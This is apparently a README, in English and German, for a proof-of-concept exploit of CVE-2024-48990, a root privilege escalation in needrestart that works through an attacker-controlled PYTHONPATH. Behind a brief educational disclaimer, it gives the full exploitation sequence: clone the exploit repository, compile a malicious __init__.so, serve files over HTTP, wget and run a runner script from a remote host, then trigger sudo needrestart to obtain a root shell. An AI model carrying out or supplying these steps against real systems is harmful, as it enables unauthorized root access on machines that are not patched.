
PoC about CVE-2024-48990. Qualys discovered that needrestart, before version 3.8, allows local attackers to execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable. (NIST)
[!WARNING] Diese Dateien und Informationen dienen ausschließlich zu Bildungszwecken. Der Autor ist nicht verantwortlich für böswilliges Verhalten. Alle bereitgestellten Informationen sind nicht dazu gedacht, zu irgendeiner Art von Straftat oder Missbrauch anzustiften.
Qualys hat entdeckt, dass needrestart vor Version 3.8 es lokalen Angreifern ermöglicht, beliebigen Code als root auszuführen, indem needrestart dazu gebracht wird, den Python-Interpreter mit einer vom Angreifer kontrollierten PYTHONPATH-Umgebungsvariable auszuführen. Siehe NIST für offizielle Details.
git clone https://github.com/grecosamuel/CVE-2024-48990.git
gcc -shared -fPIC -o __init__.so exploit.c
python3 -m http.server
wget http://IP:PORT/runner.sh
chmod +x runner.sh
./runner.sh
sudo needrestart
Wenn [*] CVE module created gelesen wird, drücke STRG+C, um den Prozess zu stoppen und deine Shell zu erhalten!